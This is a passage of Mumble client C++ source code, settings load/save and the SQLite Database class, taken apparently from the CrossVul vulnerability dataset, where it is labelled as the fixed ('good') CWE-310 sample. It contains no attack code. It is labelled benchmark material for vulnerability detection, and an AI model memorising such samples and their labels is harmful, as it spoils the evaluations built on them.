SAVELOAD(qbaDXInput, "directsound/input");
SAVELOAD(qbaDXOutput, "directsound/output");
SAVELOAD(bTTS, "tts/enable");
SAVELOAD(iTTSVolume, "tts/volume");
SAVELOAD(iTTSThreshold, "tts/threshold");
SAVELOAD(bTTSMessageReadBack, "tts/readback");
// Network settings
SAVELOAD(bTCPCompat, "net/tcponly");
SAVELOAD(bQoS, "net/qos");
SAVELOAD(bReconnect, "net/reconnect");
SAVELOAD(bAutoConnect, "net/autoconnect");
SAVELOAD(bSuppressIdentity, "net/suppress");
LOADENUM(ptProxyType, "net/proxytype");
SAVELOAD(qsProxyHost, "net/proxyhost");
SAVELOAD(usProxyPort, "net/proxyport");
SAVELOAD(qsProxyUsername, "net/proxyusername");
SAVELOAD(qsProxyPassword, "net/proxypassword");
SAVELOAD(iMaxImageSize, "net/maximagesize");
SAVELOAD(iMaxImageWidth, "net/maximagewidth");
SAVELOAD(iMaxImageHeight, "net/maximageheight");
SAVELOAD(qsRegionalHost, "net/region");
SAVELOAD(bExpert, "ui/expert");
SAVELOAD(qsLanguage, "ui/language");
SAVELOAD(qsStyle, "ui/style");
SAVELOAD(qsSkin, "ui/skin");
LOADENUM(ceExpand, "ui/expand");
LOADENUM(ceChannelDrag, "ui/drag");
LOADENUM(aotbAlwaysOnTop, "ui/alwaysontop");
SAVELOAD(bAskOnQuit, "ui/askonquit");
SAVELOAD(bMinimalView, "ui/minimalview");
SAVELOAD(bHideFrame, "ui/hideframe");
SAVELOAD(bUserTop, "ui/usertop");
SAVELOAD(qbaMainWindowGeometry, "ui/geometry");
SAVELOAD(qbaMainWindowState, "ui/state");
SAVELOAD(qbaMinimalViewGeometry, "ui/minimalviewgeometry");
SAVELOAD(qbaMinimalViewState, "ui/minimalviewstate");
SAVELOAD(qbaConfigGeometry, "ui/ConfigGeometry");
LOADENUM(wlWindowLayout, "ui/WindowLayout");
SAVELOAD(qbaSplitterState, "ui/splitter");
SAVELOAD(qbaHeaderState, "ui/header");
SAVELOAD(qsUsername, "ui/username");
SAVELOAD(qsLastServer, "ui/server");
LOADENUM(ssFilter, "ui/serverfilter");
#ifndef NO_UPDATE_CHECK
SAVELOAD(bPluginOverlayCheck, "ui/updatecheck");
SAVELOAD(bPluginOverlayCheck, "ui/plugincheck");
#endif
SAVELOAD(bHideInTray, "ui/hidetray");
SAVELOAD(bStateInTray, "ui/stateintray");
SAVELOAD(bUsage, "ui/usage");
SAVELOAD(bShowUserCount, "ui/showusercount");
SAVELOAD(qsImagePath, "ui/imagepath");
SAVELOAD(bShowContextMenuInMenuBar, "ui/showcontextmenuinmenubar");
SAVELOAD(qbaConnectDialogGeometry, "ui/connect/geometry");
SAVELOAD(qbaConnectDialogHeader, "ui/connect/header");
SAVELOAD(bHighContrast, "ui/HighContrast");
SAVELOAD(iMaxLogBlocks, "ui/MaxLogBlocks");
// PTT Button window
SAVELOAD(bShowPTTButtonWindow, "ui/showpttbuttonwindow");
SAVELOAD(qbaPTTButtonWindowGeometry, "ui/pttbuttonwindowgeometry");
// Recording
SAVELOAD(qsRecordingPath, "recording/path");
SAVELOAD(qsRecordingFile, "recording/file");
LOADENUM(rmRecordingMode, "recording/mode");
SAVELOAD(iRecordingFormat, "recording/format");
// LCD
SAVELOAD(iLCDUserViewMinColWidth, "lcd/userview/mincolwidth");
SAVELOAD(iLCDUserViewSplitterWidth, "lcd/userview/splitterwidth");
QByteArray qba = qvariant_cast<QByteArray> (settings_ptr->value(QLatin1String("net/certificate")));
if (! qba.isEmpty())
kpCertificate = CertWizard::importCert(qba);
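// Read back the stored global shortcuts; entries without a valid index
// are discarded.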
int nshorts = settings_ptr->beginReadArray(QLatin1String("shortcuts"));
for (int i=0; i<nshorts; i++) {
settings_ptr->setArrayIndex(i);
Shortcut s;
s.iIndex = -2;
SAVELOAD(s.iIndex, "index");
SAVELOAD(s.qlButtons, "keys");
SAVELOAD(s.bSuppress, "suppress");
s.qvData = settings_ptr->value(QLatin1String("data"));
if (s.iIndex >= -1)
qlShortcuts << s;
}
settings_ptr->endArray();
settings_ptr->beginReadArray(QLatin1String("messages"));
for (QMap<int, quint32>::const_iterator it = qmMessages.constBegin(); it != qmMessages.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessages[it.key()], "log");
}
settings_ptr->endArray();
settings_ptr->beginReadArray(QLatin1String("messagesounds"));
for (QMap<int, QString>::const_iterator it = qmMessageSounds.constBegin(); it != qmMessageSounds.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessageSounds[it.key()], "logsound");
}
settings_ptr->endArray();
settings_ptr->beginGroup(QLatin1String("lcd/devices"));
foreach(const QString &d, settings_ptr->childKeys()) {
qmLCDDevices.insert(d, settings_ptr->value(d, true).toBool());
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("audio/plugins"));
foreach(const QString &d, settings_ptr->childKeys()) {
qmPositionalAudioPlugins.insert(d, settings_ptr->value(d, true).toBool());
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("overlay"));
os.load(settings_ptr);
settings_ptr->endGroup();
}
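// For saving, SAVELOAD/SAVEFLAG are redefined: a key is only written when
// the value differs from a default-constructed Settings/OverlaySettings,
// otherwise the key is removed to keep the stored configuration minimal.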
#undef SAVELOAD
#define SAVELOAD(var,name) if (var != def.var) settings_ptr->setValue(QLatin1String(name), var); else settings_ptr->remove(QLatin1String(name))
#define SAVEFLAG(var,name) if (var != def.var) settings_ptr->setValue(QLatin1String(name), static_cast<int>(var)); else settings_ptr->remove(QLatin1String(name))
void OverlaySettings::save() {
save(g.qs);
}
void OverlaySettings::save(QSettings* settings_ptr) {
OverlaySettings def;
settings_ptr->setValue(QLatin1String("version"), QLatin1String(MUMTEXT(MUMBLE_VERSION_STRING)));
settings_ptr->sync();
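// Make the on-disk settings file readable and writable by the owner only;
// it can contain sensitive data such as proxy credentials.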
#if defined(Q_OS_WIN) || defined(Q_OS_MAC)
if (settings_ptr->format() == QSettings::IniFormat)
#endif
{
QFile f(settings_ptr->fileName());
f.setPermissions(f.permissions() & ~(QFile::ReadGroup | QFile::WriteGroup | QFile::ExeGroup | QFile::ReadOther | QFile::WriteOther | QFile::ExeOther));
}
SAVELOAD(bEnable, "enable");
SAVELOAD(osShow, "show");
SAVELOAD(bAlwaysSelf, "alwaysself");
SAVELOAD(uiActiveTime, "activetime");
SAVELOAD(osSort, "sort");
SAVELOAD(fX, "x");
SAVELOAD(fY, "y");
SAVELOAD(fZoom, "zoom");
SAVELOAD(uiColumns, "columns");
settings_ptr->beginReadArray(QLatin1String("states"));
for (int i=0; i<4; ++i) {
settings_ptr->setArrayIndex(i);
SAVELOAD(qcUserName[i], "color");
SAVELOAD(fUser[i], "opacity");
}
settings_ptr->endArray();
SAVELOAD(qfUserName, "userfont");
SAVELOAD(qfChannel, "channelfont");
SAVELOAD(qcChannel, "channelcolor");
SAVELOAD(qfFps, "fpsfont");
SAVELOAD(qcFps, "fpscolor");
SAVELOAD(fBoxPad, "padding");
SAVELOAD(fBoxPenWidth, "penwidth");
SAVELOAD(qcBoxPen, "pencolor");
SAVELOAD(qcBoxFill, "fillcolor");
SAVELOAD(bUserName, "usershow");
SAVELOAD(bChannel, "channelshow");
SAVELOAD(bMutedDeafened, "mutedshow");
SAVELOAD(bAvatar, "avatarshow");
SAVELOAD(bBox, "boxshow");
SAVELOAD(bFps, "fpsshow");
SAVELOAD(fUserName, "useropacity");
SAVELOAD(fChannel, "channelopacity");
SAVELOAD(fMutedDeafened, "mutedopacity");
SAVELOAD(fAvatar, "avataropacity");
SAVELOAD(fFps, "fpsopacity");
SAVELOAD(qrfUserName, "userrect");
SAVELOAD(qrfChannel, "channelrect");
SAVELOAD(qrfMutedDeafened, "mutedrect");
SAVELOAD(qrfAvatar, "avatarrect");
SAVELOAD(qrfFps, "fpsrect");
SAVEFLAG(qaUserName, "useralign");
SAVEFLAG(qaChannel, "channelalign");
SAVEFLAG(qaMutedDeafened, "mutedalign");
SAVEFLAG(qaAvatar, "avataralign");
settings_ptr->setValue(QLatin1String("usewhitelist"), bUseWhitelist);
settings_ptr->setValue(QLatin1String("blacklist"), qslBlacklist);
settings_ptr->setValue(QLatin1String("whitelist"), qslWhitelist);
}
void Settings::save() {
QSettings* settings_ptr = g.qs;
Settings def;
// Config updates
SAVELOAD(uiUpdateCounter, "lastupdate");
SAVELOAD(bMute, "audio/mute");
SAVELOAD(bDeaf, "audio/deaf");
SAVELOAD(atTransmit, "audio/transmit");
SAVELOAD(uiDoublePush, "audio/doublepush");
SAVELOAD(bTxAudioCue, "audio/pushclick");
SAVELOAD(qsTxAudioCueOn, "audio/pushclickon");
SAVELOAD(qsTxAudioCueOff, "audio/pushclickoff");
SAVELOAD(iQuality, "audio/quality");
SAVELOAD(iMinLoudness, "audio/loudness");
SAVELOAD(fVolume, "audio/volume");
SAVELOAD(fOtherVolume, "audio/othervolume");
SAVELOAD(bAttenuateOthers, "audio/attenuateothers");
SAVELOAD(bAttenuateOthersOnTalk, "audio/attenuateothersontalk");
SAVELOAD(vsVAD, "audio/vadsource");
SAVELOAD(fVADmin, "audio/vadmin");
SAVELOAD(fVADmax, "audio/vadmax");
SAVELOAD(iNoiseSuppress, "audio/noisesupress");
SAVELOAD(iVoiceHold, "audio/voicehold");
SAVELOAD(iOutputDelay, "audio/outputdelay");
SAVELOAD(iIdleTime, "audio/idletime");
SAVELOAD(fAudioMinDistance, "audio/mindistance");
SAVELOAD(fAudioMaxDistance, "audio/maxdistance");
SAVELOAD(fAudioMaxDistVolume, "audio/maxdistancevolume");
SAVELOAD(fAudioBloom, "audio/bloom");
SAVELOAD(bEcho, "audio/echo");
SAVELOAD(bEchoMulti, "audio/echomulti");
SAVELOAD(bExclusiveInput, "audio/exclusiveinput");
SAVELOAD(bExclusiveOutput, "audio/exclusiveoutput");
SAVELOAD(bPositionalAudio, "audio/positional");
SAVELOAD(bPositionalHeadphone, "audio/headphone");
SAVELOAD(qsAudioInput, "audio/input");
SAVELOAD(qsAudioOutput, "audio/output");
SAVELOAD(bWhisperFriends, "audio/whisperfriends");
SAVELOAD(bTransmitPosition, "audio/postransmit");
SAVELOAD(iJitterBufferSize, "net/jitterbuffer");
SAVELOAD(iFramesPerPacket, "net/framesperpacket");
SAVELOAD(qsASIOclass, "asio/class");
SAVELOAD(qlASIOmic, "asio/mic");
SAVELOAD(qlASIOspeaker, "asio/speaker");
SAVELOAD(qsWASAPIInput, "wasapi/input");
SAVELOAD(qsWASAPIOutput, "wasapi/output");
SAVELOAD(qsALSAInput, "alsa/input");
SAVELOAD(qsALSAOutput, "alsa/output");
SAVELOAD(qsPulseAudioInput, "pulseaudio/input");
SAVELOAD(qsPulseAudioOutput, "pulseaudio/output");
SAVELOAD(qsOSSInput, "oss/input");
SAVELOAD(qsOSSOutput, "oss/output");
SAVELOAD(qsCoreAudioInput, "coreaudio/input");
SAVELOAD(qsCoreAudioOutput, "coreaudio/output");
SAVELOAD(iPortAudioInput, "portaudio/input");
SAVELOAD(iPortAudioOutput, "portaudio/output");
SAVELOAD(qbaDXInput, "directsound/input");
SAVELOAD(qbaDXOutput, "directsound/output");
SAVELOAD(bTTS, "tts/enable");
SAVELOAD(iTTSVolume, "tts/volume");
SAVELOAD(iTTSThreshold, "tts/threshold");
SAVELOAD(bTTSMessageReadBack, "tts/readback");
// Network settings
SAVELOAD(bTCPCompat, "net/tcponly");
SAVELOAD(bQoS, "net/qos");
SAVELOAD(bReconnect, "net/reconnect");
SAVELOAD(bAutoConnect, "net/autoconnect");
SAVELOAD(ptProxyType, "net/proxytype");
SAVELOAD(qsProxyHost, "net/proxyhost");
SAVELOAD(usProxyPort, "net/proxyport");
SAVELOAD(qsProxyUsername, "net/proxyusername");
SAVELOAD(qsProxyPassword, "net/proxypassword");
SAVELOAD(iMaxImageSize, "net/maximagesize");
SAVELOAD(iMaxImageWidth, "net/maximagewidth");
SAVELOAD(iMaxImageHeight, "net/maximageheight");
SAVELOAD(qsRegionalHost, "net/region");
SAVELOAD(bExpert, "ui/expert");
SAVELOAD(qsLanguage, "ui/language");
SAVELOAD(qsStyle, "ui/style");
SAVELOAD(qsSkin, "ui/skin");
SAVELOAD(ceExpand, "ui/expand");
SAVELOAD(ceChannelDrag, "ui/drag");
SAVELOAD(aotbAlwaysOnTop, "ui/alwaysontop");
SAVELOAD(bAskOnQuit, "ui/askonquit");
SAVELOAD(bMinimalView, "ui/minimalview");
SAVELOAD(bHideFrame, "ui/hideframe");
SAVELOAD(bUserTop, "ui/usertop");
SAVELOAD(qbaMainWindowGeometry, "ui/geometry");
SAVELOAD(qbaMainWindowState, "ui/state");
SAVELOAD(qbaMinimalViewGeometry, "ui/minimalviewgeometry");
SAVELOAD(qbaMinimalViewState, "ui/minimalviewstate");
SAVELOAD(qbaConfigGeometry, "ui/ConfigGeometry");
SAVELOAD(wlWindowLayout, "ui/WindowLayout");
SAVELOAD(qbaSplitterState, "ui/splitter");
SAVELOAD(qbaHeaderState, "ui/header");
SAVELOAD(qsUsername, "ui/username");
SAVELOAD(qsLastServer, "ui/server");
SAVELOAD(ssFilter, "ui/serverfilter");
SAVELOAD(bUpdateCheck, "ui/updatecheck");
SAVELOAD(bPluginOverlayCheck, "ui/plugincheck");
SAVELOAD(bHideInTray, "ui/hidetray");
SAVELOAD(bStateInTray, "ui/stateintray");
SAVELOAD(bUsage, "ui/usage");
SAVELOAD(bShowUserCount, "ui/showusercount");
SAVELOAD(qsImagePath, "ui/imagepath");
SAVELOAD(bShowContextMenuInMenuBar, "ui/showcontextmenuinmenubar");
SAVELOAD(qbaConnectDialogGeometry, "ui/connect/geometry");
SAVELOAD(qbaConnectDialogHeader, "ui/connect/header");
SAVELOAD(bHighContrast, "ui/HighContrast");
SAVELOAD(iMaxLogBlocks, "ui/MaxLogBlocks");
// PTT Button window
SAVELOAD(bShowPTTButtonWindow, "ui/showpttbuttonwindow");
SAVELOAD(qbaPTTButtonWindowGeometry, "ui/pttbuttonwindowgeometry");
// Recording
SAVELOAD(qsRecordingPath, "recording/path");
SAVELOAD(qsRecordingFile, "recording/file");
SAVELOAD(rmRecordingMode, "recording/mode");
SAVELOAD(iRecordingFormat, "recording/format");
// LCD
SAVELOAD(iLCDUserViewMinColWidth, "lcd/userview/mincolwidth");
SAVELOAD(iLCDUserViewSplitterWidth, "lcd/userview/splitterwidth");
QByteArray qba = CertWizard::exportCert(kpCertificate);
settings_ptr->setValue(QLatin1String("net/certificate"), qba);
settings_ptr->beginWriteArray(QLatin1String("shortcuts"));
int idx = 0;
foreach(const Shortcut &s, qlShortcuts) {
if (! s.isServerSpecific()) {
settings_ptr->setArrayIndex(idx++);
settings_ptr->setValue(QLatin1String("index"), s.iIndex);
settings_ptr->setValue(QLatin1String("keys"), s.qlButtons);
settings_ptr->setValue(QLatin1String("suppress"), s.bSuppress);
settings_ptr->setValue(QLatin1String("data"), s.qvData);
}
}
settings_ptr->endArray();
settings_ptr->beginWriteArray(QLatin1String("messages"));
for (QMap<int, quint32>::const_iterator it = qmMessages.constBegin(); it != qmMessages.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessages[it.key()], "log");
}
settings_ptr->endArray();
settings_ptr->beginWriteArray(QLatin1String("messagesounds"));
for (QMap<int, QString>::const_iterator it = qmMessageSounds.constBegin(); it != qmMessageSounds.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessageSounds[it.key()], "logsound");
}
settings_ptr->endArray();
settings_ptr->beginGroup(QLatin1String("lcd/devices"));
foreach(const QString &d, qmLCDDevices.keys()) {
bool v = qmLCDDevices.value(d);
if (!v)
settings_ptr->setValue(d, v);
else
settings_ptr->remove(d);
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("audio/plugins"));
foreach(const QString &d, qmPositionalAudioPlugins.keys()) {
bool v = qmPositionalAudioPlugins.value(d);
if (!v)
settings_ptr->setValue(d, v);
else
settings_ptr->remove(d);
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("overlay"));
os.save(settings_ptr);
settings_ptr->endGroup();
}
| ./CrossVul/dataset_final_sorted/CWE-310/cpp/good_3579_1 |
crossvul-cpp_data_good_3579_0 | /* Copyright (C) 2005-2011, Thorvald Natvig <thorvald@natvig.com>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
- Neither the name of the Mumble Developers nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "Database.h"
#include "Global.h"
#include "Message.h"
#include "Net.h"
#include "Version.h"
Database::Database() {
QSqlDatabase db = QSqlDatabase::addDatabase(QLatin1String("QSQLITE"));
QSettings qs;
QStringList datapaths;
int i;
datapaths << g.qdBasePath.absolutePath();
datapaths << QDesktopServices::storageLocation(QDesktopServices::DataLocation);
#if defined(Q_OS_UNIX) && ! defined(Q_OS_MAC)
datapaths << QDir::homePath() + QLatin1String("/.config/Mumble");
#endif
datapaths << QDir::homePath();
datapaths << QDir::currentPath();
datapaths << qApp->applicationDirPath();
datapaths << qs.value(QLatin1String("InstPath")).toString();
bool found = false;
for (i = 0; (i < datapaths.size()) && ! found; i++) {
if (!datapaths[i].isEmpty()) {
QFile f(datapaths[i] + QLatin1String("/mumble.sqlite"));
if (f.exists()) {
db.setDatabaseName(f.fileName());
found = db.open();
}
QFile f2(datapaths[i] + QLatin1String("/.mumble.sqlite"));
if (f2.exists()) {
db.setDatabaseName(f2.fileName());
found = db.open();
}
}
}
if (! found) {
for (i = 0; (i < datapaths.size()) && ! found; i++) {
if (!datapaths[i].isEmpty()) {
QDir::root().mkpath(datapaths[i]);
#ifdef Q_OS_WIN
QFile f(datapaths[i] + QLatin1String("/mumble.sqlite"));
#else
QFile f(datapaths[i] + QLatin1String("/.mumble.sqlite"));
#endif
db.setDatabaseName(f.fileName());
found = db.open();
}
}
}
if (! found) {
QMessageBox::critical(NULL, QLatin1String("Mumble"), tr("Mumble failed to initialize a database in any\nof the possible locations."), QMessageBox::Ok | QMessageBox::Default, QMessageBox::NoButton);
qFatal("Database: Failed initialization");
}
QFileInfo fi(db.databaseName());
if (! fi.isWritable()) {
QMessageBox::critical(NULL, QLatin1String("Mumble"), tr("The database '%1' is read-only. Mumble cannot store server settings (i.e. SSL certificates) until you fix this problem.").arg(fi.filePath()), QMessageBox::Ok | QMessageBox::Default, QMessageBox::NoButton);
qWarning("Database: Database is read-only");
}
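// Restrict the database file to the owner; the `servers` table stores
// saved passwords, so it must not be group/world readable.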
{
QFile f(db.databaseName());
f.setPermissions(f.permissions() & ~(QFile::ReadGroup | QFile::WriteGroup | QFile::ExeGroup | QFile::ReadOther | QFile::WriteOther | QFile::ExeOther));
}
QSqlQuery query;
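// Create the schema if it does not exist yet and prune old cached
// comments and blobs.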
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `servers` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `name` TEXT, `hostname` TEXT, `port` INTEGER DEFAULT " MUMTEXT(DEFAULT_MUMBLE_PORT) ", `username` TEXT, `password` TEXT)"));
query.exec(QLatin1String("ALTER TABLE `servers` ADD COLUMN `url` TEXT"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `comments` (`who` TEXT, `comment` BLOB, `seen` DATE)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `comments_comment` ON `comments`(`who`, `comment`)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `comments_seen` ON `comments`(`seen`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `blobs` (`hash` TEXT, `data` BLOB, `seen` DATE)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `blobs_hash` ON `blobs`(`hash`)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `blobs_seen` ON `blobs`(`seen`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `tokens` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `digest` BLOB, `token` TEXT)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `tokens_host_port` ON `tokens`(`digest`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `shortcut` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `digest` BLOB, `shortcut` BLOB, `target` BLOB, `suppress` INTEGER)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `shortcut_host_port` ON `shortcut`(`digest`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `udp` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `digest` BLOB)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `udp_host_port` ON `udp`(`digest`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `cert` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `hostname` TEXT, `port` INTEGER, `digest` TEXT)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `cert_host_port` ON `cert`(`hostname`,`port`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `friends` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `name` TEXT, `hash` TEXT)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `friends_name` ON `friends`(`name`)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `friends_hash` ON `friends`(`hash`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `muted` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `hash` TEXT)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `muted_hash` ON `muted`(`hash`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `pingcache` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `hostname` TEXT, `port` INTEGER, `ping` INTEGER)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `pingcache_host_port` ON `pingcache`(`hostname`,`port`)"));
query.exec(QLatin1String("DELETE FROM `comments` WHERE `seen` < datetime('now', '-1 years')"));
query.exec(QLatin1String("DELETE FROM `blobs` WHERE `seen` < datetime('now', '-1 months')"));
query.exec(QLatin1String("VACUUM"));
query.exec(QLatin1String("PRAGMA synchronous = OFF"));
query.exec(QLatin1String("PRAGMA journal_mode = TRUNCATE"));
query.exec(QLatin1String("SELECT sqlite_version()"));
while (query.next())
qWarning() << "Database SQLite:" << query.value(0).toString();
}
Database::~Database() {
QSqlQuery query;
query.exec(QLatin1String("PRAGMA journal_mode = DELETE"));
query.exec(QLatin1String("VACUUM"));
}
QList<FavoriteServer> Database::getFavorites() {
QSqlQuery query;
QList<FavoriteServer> ql;
query.prepare(QLatin1String("SELECT `name`, `hostname`, `port`, `username`, `password`, `url` FROM `servers` ORDER BY `name`"));
query.exec();
while (query.next()) {
FavoriteServer fs;
fs.qsName = query.value(0).toString();
fs.qsHostname = query.value(1).toString();
fs.usPort = static_cast<unsigned short>(query.value(2).toUInt());
fs.qsUsername = query.value(3).toString();
fs.qsPassword = query.value(4).toString();
fs.qsUrl = query.value(5).toString();
ql << fs;
}
return ql;
}
void Database::setFavorites(const QList<FavoriteServer> &servers) {
QSqlQuery query;
QSqlDatabase::database().transaction();
query.prepare(QLatin1String("DELETE FROM `servers`"));
query.exec();
query.prepare(QLatin1String("REPLACE INTO `servers` (`name`, `hostname`, `port`, `username`, `password`, `url`) VALUES (?,?,?,?,?,?)"));
foreach(const FavoriteServer &s, servers) {
query.addBindValue(s.qsName);
query.addBindValue(s.qsHostname);
query.addBindValue(s.usPort);
query.addBindValue(s.qsUsername);
query.addBindValue(s.qsPassword);
query.addBindValue(s.qsUrl);
query.exec();
}
QSqlDatabase::database().commit();
}
bool Database::isLocalMuted(const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `hash` FROM `muted` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
while (query.next()) {
return true;
}
return false;
}
void Database::setLocalMuted(const QString &hash, bool muted) {
QSqlQuery query;
if (muted)
query.prepare(QLatin1String("INSERT INTO `muted` (`hash`) VALUES (?)"));
else
query.prepare(QLatin1String("DELETE FROM `muted` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
}
QMap<QPair<QString, unsigned short>, unsigned int> Database::getPingCache() {
QSqlQuery query;
QMap<QPair<QString, unsigned short>, unsigned int> map;
query.prepare(QLatin1String("SELECT `hostname`, `port`, `ping` FROM `pingcache`"));
query.exec();
while (query.next()) {
map.insert(QPair<QString, unsigned short>(query.value(0).toString(), query.value(1).toUInt()), query.value(2).toUInt());
}
return map;
}
void Database::setPingCache(const QMap<QPair<QString, unsigned short>, unsigned int> &map) {
QSqlQuery query;
QMap<QPair<QString, unsigned short>, unsigned int>::const_iterator i;
QSqlDatabase::database().transaction();
query.prepare(QLatin1String("DELETE FROM `pingcache`"));
query.exec();
query.prepare(QLatin1String("REPLACE INTO `pingcache` (`hostname`, `port`, `ping`) VALUES (?,?,?)"));
for (i = map.constBegin(); i != map.constEnd(); ++i) {
query.addBindValue(i.key().first);
query.addBindValue(i.key().second);
query.addBindValue(i.value());
query.exec();
}
QSqlDatabase::database().commit();
}
bool Database::seenComment(const QString &hash, const QByteArray &commenthash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT COUNT(*) FROM `comments` WHERE `who` = ? AND `comment` = ?"));
query.addBindValue(hash);
query.addBindValue(commenthash);
query.exec();
if (query.next()) {
if (query.value(0).toInt() > 0) {
query.prepare(QLatin1String("UPDATE `comments` SET `seen` = datetime('now') WHERE `who` = ? AND `comment` = ?"));
query.addBindValue(hash);
query.addBindValue(commenthash);
query.exec();
return true;
}
}
return false;
}
void Database::setSeenComment(const QString &hash, const QByteArray &commenthash) {
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `comments` (`who`, `comment`, `seen`) VALUES (?, ?, datetime('now'))"));
query.addBindValue(hash);
query.addBindValue(commenthash);
query.exec();
}
QByteArray Database::blob(const QByteArray &hash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `data` FROM `blobs` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
if (query.next()) {
QByteArray qba = query.value(0).toByteArray();
query.prepare(QLatin1String("UPDATE `blobs` SET `seen` = datetime('now') WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
return qba;
}
return QByteArray();
}
void Database::setBlob(const QByteArray &hash, const QByteArray &data) {
if (hash.isEmpty() || data.isEmpty())
return;
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `blobs` (`hash`, `data`, `seen`) VALUES (?, ?, datetime('now'))"));
query.addBindValue(hash);
query.addBindValue(data);
query.exec();
}
QStringList Database::getTokens(const QByteArray &digest) {
QList<QString> qsl;
QSqlQuery query;
query.prepare(QLatin1String("SELECT `token` FROM `tokens` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
while (query.next()) {
qsl << query.value(0).toString();
}
return qsl;
}
void Database::setTokens(const QByteArray &digest, QStringList &tokens) {
QSqlQuery query;
query.prepare(QLatin1String("DELETE FROM `tokens` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
query.prepare(QLatin1String("INSERT INTO `tokens` (`digest`, `token`) VALUES (?,?)"));
foreach(const QString &qs, tokens) {
query.addBindValue(digest);
query.addBindValue(qs);
query.exec();
}
}
QList<Shortcut> Database::getShortcuts(const QByteArray &digest) {
QList<Shortcut> ql;
QSqlQuery query;
query.prepare(QLatin1String("SELECT `shortcut`,`target`,`suppress` FROM `shortcut` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
while (query.next()) {
Shortcut sc;
QByteArray a = query.value(0).toByteArray();
{
QDataStream s(&a, QIODevice::ReadOnly);
s.setVersion(QDataStream::Qt_4_0);
s >> sc.qlButtons;
}
a = query.value(1).toByteArray();
{
QDataStream s(&a, QIODevice::ReadOnly);
s.setVersion(QDataStream::Qt_4_0);
s >> sc.qvData;
}
sc.bSuppress=query.value(2).toBool();
ql << sc;
}
return ql;
}
bool Database::setShortcuts(const QByteArray &digest, QList<Shortcut> &shortcuts) {
QSqlQuery query;
bool updated = false;
query.prepare(QLatin1String("DELETE FROM `shortcut` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
const QList<Shortcut> scs = shortcuts;
